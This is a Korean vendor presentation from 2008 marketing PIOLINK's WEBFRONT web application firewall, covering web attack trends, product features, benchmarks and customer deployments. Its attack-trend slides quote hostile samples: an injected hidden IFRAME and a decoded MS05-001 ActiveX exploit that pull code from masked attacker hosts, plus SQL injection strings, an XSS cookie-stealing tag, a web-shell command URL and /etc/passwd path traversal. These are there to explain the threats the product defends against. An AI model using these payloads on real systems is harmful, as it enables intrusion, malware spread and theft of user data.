차세대 웹방화벽 “WEBFRONT” 2008. 2. 29. 파이오링크 기술지원센터 (support@piolink.com)
차 례 I 웹 해킹 동향 II 차세대 웹방화벽 ‘WEBFRONT’ III 기술지원 및 유지보수 정책 V 주요 구축 사례
웹 해킹 동향 1) 해킹 동향
HTTP reply (HTML, Javascript, VBscript, etc) WEB은 왜 취약한가? 구조적인 취약성 접근성: 내부 DB 시스템까지 접근하는 유일한 통로. (기존 방화벽은 port 80/443를 열어 놓음) 모듈화: 3-tier의 별도의 모듈이 결합되고 Third Party에 의해 개발됨. 원격 제어: 원격의 사용자에 입력에 따라 명령어 수행. 3 Tier Architecture ADO, ODBC, etc.. HTTP request (cleartext or SSL) DB Web Server 방화벽/IPS Web app Web Client Connector Web app DB Web app Connector Web app Apache, IIS, IBM, Sun, Zeus, etc Websphere, OAS, Weblogic, JSP, Netscape, Perl, C/C++, etc Oracle, MS-SQL, Informix, MySQL PostgreSQL, Sybase, etc IE, Firefox, Netscape, Oprea HTTP reply (HTML, Javascript, VBscript, etc)
웹 보안의 현주소 가용성만을 위한 투자 개발시 보안을 고려하지 않음 코드 리뷰의 어려움 중요 시스템만 관심 현재까지 애플리케이션의 가용성을 높이기위한 투자가 다수 (L4 Switch, Cluster, 네트워크장비 이중화) 해킹으로 인한 서비스 정지가 더욱 심각함 개발시 보안을 고려하지 않음 애플리케이션 개발자와 보안 컨설턴트의 협력 필요 개발된 애플리케이션의 취약점을 수정하고 분석하는 반복된 작업 필요 코드 리뷰의 어려움 이미 개발된 시스템에 대해 코드 리뷰를 통해 취약점을 찾기 어려움 발견된 취약점에 대해서도 수정이 어려움 중요 시스템은 보안이 잘되었음 (메인 홈페이지, 회계, 인사 시스템) 이용자가 적거나 관리가 되지 않는 오래된 시스템은 취약 해커는 취약한 시스템을 해킹후 메인 시스템 해킹 (보안의 하향 평준화) 중요 시스템만 관심 기존의 방화벽, IDS, IPS의 시그니쳐 매칭 방식인 Negative 정책은 새로운 공격과 변종 공격에 대응하기 어려움 기존 보안 제품 한계
웹 해킹의 동향 - l 해킹 사고의 유형 해킹사고의 유형 중 70%이상이 웹 취약성을 대상으로 함. 목적의 이동 사이버 머니, 온라인 게임, 인터넷 뱅킹, 쇼핑몰 증가, EC 활성화 단순 호기심, 정보 획득 -> 정치적, 경제적, 사회적 목적 化 HTTP (Port 80) NETBIOS (Port 139) Microsoft-DS (Port 445) Location Service (Port 135) ICMP Other Source : Network World August 2003 정치, 군사적 사이버 머니 탈취 계정 도용, 탈취 콘텐츠 탈취 홈페이지 변조 게시판 도배 DoS/DDoS 공격 호기심, 과시욕, 취미 SHIFT 경제적 사회적
웹 해킹의 동향 - ll 전문가 일반인 자동화 툴 유닉스 윈도우 악성코드 서버 개인PC 개인정보유출
웹 해킹 동향 2) 중국발 해킹
중국 발 해킹 최근 금전적인 이익을 목적으로 시도되는 중국발 해킹 공격이나 피싱(Phishing) 공격이 꾸준히 증가, 해당 서버를 침해시키기 보다 신뢰성을 이용하여 보안에 취약한 사용자를 공격하는 매개체로 활용 중국 발 해킹 공격 홈페이지의 권한 획득 이후 IFRAME, 소스변조 등의 공격을 통해 악성프로그램 유포 및 개인정보 수집 서비스거부(DDoS) 악성프로그램에 감염된 여러대의 좀비 PC를 이용해 DDoS 공격 최근 금융권 싸이트를 대상으로 협박하여 금전을 요구 MS 취약점을 이용한 Zero Day 공격 패치가 발표되기 전 MS 취약점 이용 공격 코드 생성 및 악용 금전적인 이익을 위한 End-User PC 공격에 주로 활용 피싱 기법을 이용한 End-User 공격 스크립트, URL 스푸핑, 눈속임 등을 통한 공격 주로 금융권, 온라인 게임의 사이버 머니 및 아이템 불법 획득이 표적이 되고 있음 ActiveX 를 이용한 공격 홈페이지의 권한 획득 이후 또는 접근 가능한 서비스를 이용해 피싱이나 웜 바이러스의 유포 경로로 사이트 악용하거나 악성프로그램 유포 및 개인정보 수집
중국 발 해킹 - 시나리오 최근 중국측에서 홈페이지 변조 후 홈페이지 메인 페이지에 IFRAME을 삽입시켜 해커 컴퓨터의 특정 악성 페이지를 열람하도록 하여 일반 사용자가 변조된 홈페이지 방문 시 악성 프로그램이 설치되는 기법들을 주로 사용. 신뢰있는 기업의 홈페이지 서버 해킹 후 악성 스크립트 삽입 1 악성 IFRAME 삽입 IFRAME TAG 삽입 </map> <% 'Server.Execute "FX_xxxx.asp" %> <!-- // --><iframe src="http://www.xxxx.com/code.html" width="0" height="0"></iframe> </body></html> INTERNET 사용자 정보 획득 3 사이트 방문시 악성코드 감염 2 악의적인 사용자(Cracker) http://www.xxxx.com/code.html 공격자 홈페이지에 있는 공격 코드 <HTML> <script type="text/JScript.Encode">#@~^2REAAA==@!eOR@#@&7lD,3z?DD~',J)$;f2w!C&9|d\HrhJ,_@#@&E}"?Pjj(I}C81N+WE,_@#@&rL4k%0VsxWa;MdY!\EP3@#@&ES6X.TFy&cl{%O_JJ~_@#@&r'Ei@#@&0!x^ObWx~n mGNW`r w!Y#, @#@&k -CVbN,4C/nWP^tm.l1Yn.kPkU~DtnPbUaEO,Y6Yc- EP3@#@&Jjlsr9P4md++cP14CDmmD+./~CM+~b t~,lR"BP! - Javascript.Encode로 인코딩 된 것을 확인 사이트 이용자 www.xxxx.com/code.html <OBJECT id="cnbore2" type="application/x-oleobject“ classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"> ............. <PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT src=\\\"http://www.hackxxxx.com/xxxxx/bbs003302.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'> Decoding된 공격 코드 decoding - MS05-001 HTML Help Control ActiveX 취약점 이용한 공격 코드
중국 발 해킹 - ActiveX 취약점 공격 악의적인 ActiveX 컨트롤을 이용하여 사용자 컴퓨터 내 파일을 변조 또는 복사, 수정, 명령실행 등이 가능하며 레지스터리 값을 변경시켜 사용자의 컴퓨터에 심각한 피해를 입힐 수 있음. 신뢰있는 기업의 홈페이지 서버 악성 embed 코드 악성 embed TAG 삽입 <object classid="clsid:66B30EA0-C033-4D4B-9F90-EA0AF07363AF" codebase="http://so.xxx.co.kr/aaPlay_1.CAB#version=1,2,0,3" height="300" width="300"><param name="PlayCount" value="0"></object> 해킹 후 악성 ActiveX 변조 1 INTERNET 사용자 정보 획득 임의 명령 실행 3 사이트 방문시 악성코드 감염 2 악의적인 사용자(Cracker) 사이트 이용자 이미 설치된 Activex는 C:\WINDOWS\ Downloaded Program Files에서 찾아볼 수 있음.
중국 발 해킹 – 웹 DDoS 공격 서비스 불가 다수의 좀비 악성프로그램에 감염된 다수의 좀비 PC에 명령을 통해 대상 웹 서비스에 문제를 발생 좀비PC의 대량화 및 상업화 추세 서비스 불가 다수의 좀비 공격 원격제어/DDoS 명령
웹 해킹 동향 3) 웹 해킹
웹 공격의 유형 ‘입력값 검증 부재’를 이용한 공격 예 Parameter tempering Invalid Method Cookie Poisoning Forceful browsing Buffer overflow
웹 해킹 - SQL Injection 취약점 설명 DB와 연동되는 웹 페이지의 특정한 파라메터 값에 특정 쿼리를 삽입하여 에러를 유도하고 인증을 우회하는 공격방법 -공격 방법 일반적으로 알려진 공격 코드 (‘ or 1=1–, ‘ or ‘’=‘, ’ or ‘a’=‘a) 자동화 공격툴 NBSI, HDSI등을 이용
웹 해킹 - XSS 취약점 설명 해커는 웹 페이지에 사회공학적인 방법을 이용하여 악성코드를 삽입하고 일반 사용자가 웹 페이지에 접속했을때 악성코드가 실행되어 개인정보등을 유출하는 공격 -공격 방법 공개된 게시판이나 웹 페이지에 악성스크립트를 삽입하여 개인정보 취득 <img src=javascript:alert(document.cookie)> <iframe src=”http://www.naver.com/index.html”> => 중국발 해킹에 많이 사용
웹 해킹 – Cookie Poisoning 사용자의 권한이 레벨 5로 상승됨 취약점 설명 전송되는 쿠키를 재사용 하거나, 사용자 권한 레벨을 조정하여 권한 획득 -공격 방법 XSS 공격을 이용해 취득한 쿠키정보나, 자신의 쿠키를 변조하여 권한 획득 사용자의 권한이 레벨 5로 상승됨
웹 해킹 - 폼 필드 변조 취약점 설명 구현된 웹 URL의 파라메터를 변조하여 예측이 가능한 게시물이나 사용자 정보를 획등하는 공격 -공격 방법 http://192.168.204.97/user_modify.asp?user_id=test test라는 파라메터값을 변조시켜 다른 사용자 정보를 획득함
웹 해킹 – 웹 DoS 취약점 설명 기존의 Network기반의 DoS공격보다 더 효율적인 공격 수단으로 단순하게 SYN, ACT, FIN이 아닌 실제적인 요청(GET, POST)로 서버의 부하를 증가시켜 서비스 마비 -공격 방법 학생이 단순하게 만든 툴을 이용하여 뜻을 같이한 학생 몇명이 모여 원서접수 사이트 공격
웹 해킹 - Command Injection 취약점 설명 시스템 명령을 직접내릴 수 있는 함수(쉘코드)에 악의적인 의도의 명령어를 삽입하여 실행하는 공격 -공격 방법 함수(쉘코드)를 웹 서버에 업로드 시킨 후 시스템 명령을 실행 http://192.168.204.97/cmdshell.asp?cmd=dir
웹 해킹 – Forceful Browsing 웹 애플리케이션에서 저장된 자료에 다운로드를 제공하는 경우, 권한이 없는 접근자도 다운로드 가능 ‘다운로드 스크립트’를 이용하여 다운로드를 제공 하는 경우 URL칸의 인수값에 다양한 문자열등을 입력 하여 비공개 콘텐츠의 유출 가능 유료 멀티미디어 파일을 임의로 접근할 수 있음
웹 해킹 - 파일 다운로드 취약점 설명 파일 다운로드 기능에서 다은로드 받는 파일 명의 대한 필터링이 없을 경우 상위 디렉토리로 올라가서 시스템의 중요 파일들을 다운로드 받는 공격 -공격 방법 http://192.168.204.97/download-process.asp?dir=../../&fname=conf.xml http://192.168.204.97/download.asp?filename=../../../../../../etc/passwd
웹 해킹 동향 4) 피해 사례
최근 피해 사례 I <08년 6월 한나라당 홈페이지> <08년 6월 경찰청 홈페이지> <08년 5월 중앙일보 홈페이지>
최근 피해 사례 II 게시판, 파일다운로드, Active X 설치등으로 Cross Site Scripting, 피싱, 파밍, 트로이 목마, 바이러스 유포 숙주사이트로 인해 고객의 손해 유발 숙주 사이트에 대한 책임 가중, 대규모 법적 소송으로 확대 온라인 게임 계정 악성 코드 유포 온라인 게임 계정 유출하는 트로이 목마 설치 (MhtRedir) 사용자가 웹 사이트 방문만으로 감염이 됨. (신문사, 영어 학원, 영화관 해킹 사례) 인터넷 뱅킹 해킹 사례
최근 피해 사례 III <http://www.krcert.or.kr KrCERT-AR-2007 아이템 거래사이트 대상 DDoS 공격사례 분석>
최근 피해 사례 IV Mass SQL Injection Mass Injection: 중국에서 Bot을 만들기 위해 대량의 SQL Injection이 가능한 툴을 개발, 무작위적으로 웹사이트 공격시도
2. 차세대 웹방화벽 “WEBFRONT”
웹 방화벽과 기존 보안장비와 차이점 Web Server 웹 방화벽 IPS 방화벽 Nimda LANd Code Red Nimda cmd.exe Telnet LANd NetBIOS DOS SQL Inj XSS Buffer Overflow Web Server 웹 방화벽 방화벽 IPS
IPS와 웹 방화벽은 경쟁 상태가 아닌 상호 보완 관계 웹 방화벽과 기존 보안장비와 차이점 IPS 웹 방화벽 Deep Packet Inspection Reassemble Isue Application Proxy 요청 검사 요청, 응답 검사 쿠키 암호화, 마스킹 기능 지원 Negative 정책 위주 Negative, Positive 정책 시스템 보안 모든 애플리케이션 보안 웹 서비스에 특화된 보안정책 IPS와 웹 방화벽은 경쟁 상태가 아닌 상호 보완 관계
웹방화벽의 동작 원리 웹방화벽 웹 서버 클라이언트 SYN SYN + ACK 보안 OK: 웹서버 전달 ACK 보안 No: 차단 GET/PUSH/POST (요청) SYN + ACK ACK SYN 보안 OK: 클라이언트 전달 보안 NO: 차단 * 필요시 데이터 변경 후 전달 GET/PUSH/POST (요청) Data (응답) Data (응답) FIN FIN + ACK ACK FIN FIN + ACK ACK
보안 정책에 따라 요청/응답의 데이터 부분까지 확인해야 하므로 성능/안정성을 기반으로 한 구현 필요 웹방화벽의 데이터 처리 범위 웹 방화벽 웹 서버 클라이언트 요청시 보안 정책에 따라 요청/응답의 데이터 부분까지 확인해야 하므로 성능/안정성을 기반으로 한 구현 필요 응답시
웹방화벽의 주요 기능 웹방화벽 1. 요청검사 2. 컨텐츠 보호 4. 적응학습 3. 위장 클라이언트 웹 서버 URL 정보 위장 어플리케이션 접근제어 폼 필드 검사 과다요청제어(Web DoS) 쿠키 보호 버퍼 오버 플로우 차단 SQL/스크립트 차단 업로드파일/요청형식 검사 검사회피차단 신용카드정보유출 차단 주민등록번호유출 차단 계좌번호유출차단 웹변조 방지 응답형식검사 코드노출 차단 사용자 요청 User Request 사용자 요청 User Request 클라이언트 검사를 통과한 요청 웹 서버 검사를 통과한 응답 검사를 통과한 응답 웹방화벽 서버 응답 Server Reply 4. 적응학습 3. 위장 어플리케이션접근제어 학습 폼필드 학습 쿠키 학습 SQL/스크립트(XSS) 학습 쉘코드 학습 URL 정보 위장 서버 정보 위장
WEBFRONT 보안 기능 - Request Validation 웹 보안의 가장 중요한 기능으로 클라이언트가 웹 서비스에 대한 요청을 보냈을 때 악의적인 요청 및 침입을 검사하여 차단 방어하는 기능입니다. 요청 검사 (Request Validation) 사용자 요청 User Request 웹 서버 클라이언트 정상 요청 검사를 통과한 요청 불법 요청 세부항목 어플리케이션 접근 제어 (Application Access Control) 폼 필드 무결성 검사 (Form Field Integrity Inspection) 폼 필드 형식 검사 (Form Field Format Inspection) 쿠키 무결성 검사 (Cookie Integrity Inspection) 쿠키 형식 검사 (Cookie Format Inspection) 쿠키 접근 제어 (Cookie Access Control) 과다 요청 검사 (Request Flood Inspection) 버퍼 오버플로우 차단 (Buffer Overflow Prevention) SQL 삽입 차단 (SQL Injection Prevention) 스크립트 삽입 차단 (Cross Site Scripting Prevention) 검사 회피 차단 (Evasion Detection) 요청 형식 검사 (Request Header Validation) 요청 방법 검사 (Request Method Validation) WISE Filter™
WEBFRONT 보안 기능 - Content Protection 클라이언트 요청에 대한 웹 서비스의 응답을 확인하여 차단 또는 마스킹(Masking)하는 기능으로 신용 카드나 주민등록번호 등의 개인 정보 및 서버 정보의 유출을 방지합니다. 컨텐트 보호 (Content Protection) 서버 응답 Server Reply 웹 서버 클라이언트 검사를 통과한 응답 검사를 통과한 응답 불법 응답 차단 세부항목 웹 변조 방지(Web Page Integrity Inspection) 신용 카드 정보 유출 차단(Credit Card Information Leakage Prevention) 주민 등록 번호 유출 차단(Social Security Number Leakage Prevention) 계좌 번호 유출 차단(Bank Account Number Leakage Prevention) 응답 형식 검사(Response Header Validation) 코드 노출 차단(comment masking) WISE Filter™
WEBFRONT 보안 기능 - Cloaking 서버 존을 가상화하고 서버 정보의 유출을 차단하여 클라이언트에게 실제 서버 존의 위치와 서버 정보를 숨기는 기능입니다. 웹 서버 클라이언트 서버응답 Server Reply 위장된 응답 위장된 응답 Cloaking Information URL 상세 주소 IP Address TCP Port Number 서버의 개수, 종류 WAS type Operating System Version Numbers Patch Levels 서버 위장 (Cloaking) 세부항목 URL 변환(Bi-directional URL Translation, WAT) 부적절한 에러 처리(Improper Error Handing) 서버 정보 위장 (Server Masquerading) 서버 부하 분산 (Server Load Balancing)
WEBFRONT 보안 기능 - Adaptive Learning 정상적인 웹 서비스에 대한 요청과 응답을 기준으로 애플리케이션의 정보를 학습하는 기능으로 다양한 보안 정책을 간단하고 손쉽게 적용하도록 도와줍니다. Adaptive Learning 웹 서버 클라이언트 사용자 요청 User Request 사용자 요청 User Request 검사를 통과한 요청 검사를 통과한 응답 검사를 통과한 응답 서버 응답 Server Reply “A” => “A” “B” => “B” 세부항목 접근 제어 학습(Application Access Control) 폼 필드 학습(Form Field) 쿠키 학습(Cookie) SQL 사용 학습(SQL Usage) 스크립트 사용 학습(Scripting Usage) 쉘 코드 사용 학습(Shell code Usage)
State of the Art Platform Design Enables Groundbreaking Performance PIOLINK 제품 로드맵 10G State of the Art Platform Design Enables Groundbreaking Performance New-10G WF Analyzer Equipment Management System PAS 8000 Multi giga WF-XG Security Manager PAS 5000 PAS 4500 WF-SE Parallel Contents Processing Engines boost true L7 switching and Security functions PAS4000 Giga High Performance Flexible Multi Giga I/F Switch 9 G PAS3000 PB2000 100M 2 G + 8~16 10/100M 0~3 G + 8~24 10/100M PAS1700 PB1508/PB1016 8~16 10/100BaseT 8~16 10/100M 2002~2003 2004 2005 2006 2007 2008
+ WEBFRONT의 제품 구성 WEBFRONT WEBFRONT Analyzer 웹 서버 앞단에 위치하여 외부 해킹 및 정보유출로부터 웹 에플리케이션을 보호하는 파이오링크의 고성능/고용량 웹 보안 스위치 WEBFRONT로 부터 log 정보를 데이터베이스化하여 관리자에게 전문 리포팅 및 분석 자료를 제공하는 웹 보안 분석도구
WEBFRONT의 제품 구성 및 주요 스펙 WEBFRONT 시리즈 제품명 PIOLINK 비고 외관 Interface WEBFRONT-XG WEBFRONT-SE 비고 외관 Interface 16 UTP Gig 16 Fiber Gig Combo 형태 Power Dual Hardware Bypass 2 Port Copper Switch Backplane 88 Gbps 88Gbps TPS 60,000 30,000 Throughput 4Gbps 1.5Gbps Concurrent Session 2,000,000 1,000,000
국산 vs 외산 웹방화벽 비교 구분 국산 외산 비고 2004년쯤 국내에 소개된 웹 방화벽 제품은 외산이 처음 소개가 되었으며 2005년 부터 국산 제품들이 차별화를 선언하며 시장에 선보이게 됨. 구분 국산 외산 비고 생성시기 1~2년 3~4년 제품타입 서버(SW) 어플라이언스 스위치 보안기능 중상 성능 관리편의성 한글지원 가능 불가 국내 고객 선호 커스터마이징 (고객요구수용) 고객 선호 조건 보안성검토/인증 공공/교육기간 진입 장애
O (Inline Fail-open I/f) 경쟁제품비교 vs WEBFRONT-XG 제품명 PIOLINK WEBFRONT-XG NetContinuum NC-2000 F5 Networks BIGIP-6800 Citrix Teros APS-200 iMPERVA G16 외관 Interface 16 UTP Gig 16 Fiber Gig 2 UTP Gig (2 Fiber Option ) 4 Fiber Gig 6 UTP Gig (Max 4 Fiber) Hardware Bypass 2 Port X O (Inline Fail-open I/f) Switch Backplane 88 Gbps 44 Gbps x TPS 60,000 40,000 N/A 8,000 16,000 Throughput 4Gbps 800Mbps 1Gbps 300Mbps 2Gbps Concurrent Session 2,000,000 1,000,000 500,000
경쟁제품비교 (~계속) vs WEBFRONT-XG 제품명 PIOLINK 모니터랩 WI-1000 팬타시큐리티 WAPPLE1000 WEBFRONT-XG/SE 모니터랩 WI-1000 팬타시큐리티 WAPPLE1000 외관 Interface 16 UTP Gig 16 Fiber Gig 4 UTP Gig 2 Fiber Gig 2 UTP Gig Hardware Bypass 2 Port Switch Backplane 88 Gbps Appliance TPS 60,000/30,000 9,000 10,000 Throughput 4Gbps/2Gbps 1Gbps Concurrent Session 2,000,000/1,000,000 500,000
성능/안정성(보안정책 적용 전/후) 웹 방화벽 특성상 정책 설정전의 기본성능과 보안정책 적용후의 성능 저하에 대한 충분한 검토 필요 기본 성능은 뛰어나나 정책적용 시 터무니 없는 성능 저하율 보임 기본 성능이 너무 낮음 구분 P F M N I W S 정책 전 60,000 85,000 9,000 10,000 35,000 21,000 정책설정 후 45,000 6,400 5,000 3,000 변화율(%) 25% 92% 44% 100% 70%
WEBFRONT 성능 평가 (고객 평균) SE : Throughput, Latency를 최상으로 지원. TPS/CPS 60K 30K 2M 1G 4G Concurrent Sessions 1M Throughput (bps) 상 SE : Throughput, Latency를 최상으로 지원. 최상 고객 요구 수준 Latency WEBFRONT-XG 성능 WEBFRONT-SE 성능
WEBFRONT 고성능의 이유 성능 저하 기존 Proxy 방식 State Machine 기반 처리 방식 C/S 개의 Socket 통신에 대한 overhead 모든 커넥션이 Network Stack을 거치면서 발생하는 Overload -> 고성능 H/W로도 성능의 한계 Client Server WEBFRONT State Machine 기반 처리 방식 단순화된 Sate Machine 기반의 Delay Binding 구현 TCP Overhead/Network Stack 단순화 -> 고성능 서비스 가능 * 특허출원번호 : 제 10-2004-0048404호 Client Server
SSL 가속 (Option) 5000 cps, 10000 cps HTTPS 적용 모델 WEBFRONT SE / XG 성능 5,000 TPS, 10,000 TPS 라이센스 발행 5000 cps, 10000 cps 기능 해시 알고리즘(Hash Algorithms) Message Digest 5 (MD5) SHA1 악수 프로토콜(Handshake Protocol) SSL 3.0/3.1/TLS 1.0 SSL 2.0 (Client Hello) 세션 재사용(Session reuse) 세션 재협상(Session renegotiation) 알고리즘 RC4, DES, 3DES, RSA, DH, DSA 감시(Monitoring) SSL 세션에 대한 다양한 통계 및 감시 기능 SSL 세션 ID 지속(Stickiness) SSL 모듈은 세션의 지속성을 유지함
WEBFRONT-부가기능 Server Load Balancing Network Security 클라이언트 웹 페이지 요청 웹 서버 HTTP 요청 전송 HTTP 요청 버퍼링 & 실제 서버 선택 & HTTP 요청 전송 HTTP 응답 전송 HTTP 응답 전송 TCP 세션 연결 라우터 네트워크 방화벽 WEBFRONT Web Zone HTTP/S 방화벽 IPS Telnet FTP NetBIOS Ping of Death WORM Virus SQL injection 쿠키변조 Buffer Overflow Scan Web Servers Database Applications WEB Application Firewall DoS/DDoS IP Spoofing Server Load Balancing Network Security Transparent/High Availability
유연한 네트워크 구성 인터페이스 유연성 Port 트렁킹으로 WAN 대역폭 확장 15대의 서버 직접 연결 별도의 L2 switch 없이 최대 15대의 서버를 웹 방화벽에 직접 연결 광(Fiber) 케이블, UTP 케이블 자유자재로 연결 여러 개의 VLAN 세그먼트로 분리하여 보안성 향상 포트 트렁킹, 미러링으로 확장 용이 Port 트렁킹으로 WAN 대역폭 확장 라우터 모니터링을 위한 트래픽 미러링 10/100/1000 BASE-T UTP 통신 Mirroring 15대의 서버 직접 연결 VLAN-1 VLAN-N IDS, Mirroring Server 1000 BASE-SX 광통신
관리의 편의성 예제 (한글, GUI)
3. 기술지원 및 유지보수 정책
시장 점유율이 높고, 기술지원이 원활환 제품 구매!! 웹방화벽은 기술지원이 중요합니다 웹 방화벽 도입은 보안성/안정성/(관리)편의성 등 여러가지 관점에 신중히…. - 신중한 검토 없이 도입한 많은 고객이 이미 ‘무용지물’로 취급하는 경우 다수 제품 도입 전 충분한 검증을 통해 도입 결정 (실망 / 로컬 BMT) - 신뢰할 수 있는 제품 도입을 위해서는 담당자의 노력이 필요 웹 방화벽 도입 후 계속적인 관심을 가지고 운용해야 함 - 웹 서비스 분석과 함께 보안정책 적용 - 변경되는 웹 서비스에 따라 다른 보안정책 적용 - 시그니처의 주기적인 업데이트 시장 점유율이 높고, 기술지원이 원활환 제품 구매!!
기술지원 흐름도 단계 1: 준비 단계 2: 설치 단계 3: 운영 및 교육 사이트 현황 파악 (네트워크, 어플리케이션, 보안정책) 취약점 분석(Web Scanner) 및 취약점 보고서 작성 설치(or BMT/데모) 계획서 준비 사전 테스트 (Lab) 단계 1: 준비 학습모드(Learning Mode) 기반 서비스: Level 1 학습모드 결과 분석 및 적용 범위 결정 탐지모드(Alert Mode) 기반 서비스: Level 2 차단모드(Prevention Mode) 기반 서비스: Level 3 단계 2: 설치 운영자 교육 (운영/모니터링/장애 처리 등) 운영 및 유지보수 최신 웹 보안 관련 정보 제공 및 업데이트 단계 3: 운영 및 교육
유지보수 정책 전문엔지니어를 보유하고 있는 공식 파트너를 통해 최고의 서비스 제공 Warranty 기간 : 12개월 (판매일 기준) 파이오링크 보안 정보 제공 /최신 펌웨어 릴리스 정보 제공 /버그 패치 공인 파트너 설치/설정 /장애 대응을 포함한 기본적인 기술지원 Warranty In 고객 정기 교육 참여, 장애 통보, 펌웨어 업그레이드 공인 파트너와 유상 유지 보수 체결 서비스 레벨에 따른 차별화된 서비스 (Gold/Silver/Bronze/Only HW) Warranty Out # Warranty Out시에는 계약한 업체가 파이오링크와 별도의 계약이 되어 있어야만 원활한 서비스가 가능합니다.
4. 주요 구축 사례
WEBFRONT 도입 사례 2006년 출시 이후에 대형 고객으로부터 혹독한 검증을 거쳐 선정됨. 56
Active Standby 수십대의 서버가 있는 DMZ 앞에 (A통신사) 외산 도입 실패 경험 (안정성), 국내 최대 무선 Telco. 사업자로서, 국내외 WAF 중 8개사를 대상으로 제품 선정 작업 실시 국내 WAF BMT 사상 처음으로 2GB 성능부하 측정 NSS/OWASP/WASC 등의 객관적 국제 평가 기준을 적용 기능 평가 도입시 중요사항 : 성능/안정성, 보안성, 확장성 A사 구축사례 특징 DMZ Internet L4_1 L4_2 FW_1 WAF_1 WAF_2 Switch_1 Switch_2 Active Standby 외산 도입 실패 경험 (안정성), 모의 침투 테스트(w/ 설문지), 약 30개 서비스 Analyzer 57
외산 도입 실패 경험 (안정성/서비스), 웹스캐닝 + 설문지, L4를 이용해 한꺼번에 4대를 병렬로 (B사) 국내 최대 유선 Telco. 사업자로서, 국내 WAF중 3개사를 대상으로 제품 선정 작업 실시 WAF BMT시 1GB 성능 부하 측정, Active-Active HA 구성 NSS/OWASP/WASC 등의 객관적 국제 평가 기준을 활용 기능 평가 도입시 중요 사항: 성능,안정성, 보안성, 커스터마이징 B사 구축사례 특징 DMZ_1 DMZ_2 L4_1 L4_2 L4_3 L4_4 WAF_1 WAF_2 WAF_3 WAF_4 외산 도입 실패 경험 (안정성/서비스), 웹스캐닝 + 설문지, 약 150개 서비스 58
보안사고 우려 초기 도입, 웹스캐닝+설문지, 약 30개 서비스 서버가 너무 많아 관문에 (C연구기관) C연구기관 구축사례 특징 국내사 대상으로 자체 기준에 따라 선정 별도 BMT 시 없음 도입시 중요사항: 성능, 안정성, 인지도 DMZ_1 DMZ_2 내부망 IPS WAF FW 보안사고 우려 초기 도입, 웹스캐닝+설문지, 약 30개 서비스 59
WAF + 서버 로드 밸런싱, 이중화, 설문지, 약 20개 서비스 L4없이 WAF+HA+LB를 한꺼번에 (D병원) MS Window 2003 랜카드 이중화 구성 WAF Active-Standby 이중화 구성 서버 웹방화벽 기능과 SLB(Server Load Balancing) 동시 구현 사전 보안취약성 검토 후, 각 취약점에 적합한 보안 설정 Decision Factors : 성능, 안정성, 보안성 D병원 구축사례 특징 WAF_1 (Active) WAF_2 (standby) WAF + 서버 로드 밸런싱, 이중화, 설문지, 약 20개 서비스 60
기존 구성에 Transparent 하게 [E공사) 국내사 5개 대상 최상위 제품으로 로컬 BMT 고객 서비스 부분으로 업체별 1일의 성능/보안성/안정성 테스트 도입시 중요사항: 성능, 안정성, 보안성 E공사 구축사례 특징 안정성, 웹스캐닝 + 설문지, 약 30개 서비스 서버 팜 <관문> <DMZ> 61
외부 서비스 존과 내부 서비스 존에 각각 [F도청) 국내 제품 대상으로 선정 도입 검토 자체 기준으로 안정적이고 최고의 성능 서비스 가능 여부 검토 도입시 중요사항: 성능, 안정성, 보안성 F도청 구축사례 특징 Internet 사용자 방화벽 구간 암호화 구간 백본 스위치 라우터 연계 기관 사 용 자 인터넷라우터 웹방화벽 공개용 서버 내부용 서버 별개의 서비스에 각각 구성, 설문지, 약 30개 서비스 62
DMZ 서비스에 기존 L4와 연동 [G대학교) 국내 제품 대상으로 선정 도입 검토 실망 테스트 후 서비스 가능 여부 결정 (교육부 SIMS 연동 예정) 도입시 중요사항: 성능, 안정성, 보안성 G대학교 구축사례 특징 FW_1 B/B_1 L4_1 L4_1 FW_2 Internet (KT, Dacom, KISTI, EPNet…) 웹방화벽 DMZ 웹방화벽 WAF_2 L4_2 FW_3 L4_2 B/B_2 FW_4 L4의 LB기능 이용, HTTP만 Redirection, 설문지, 약 117개 서비스, 일부는 세부 63
Q & A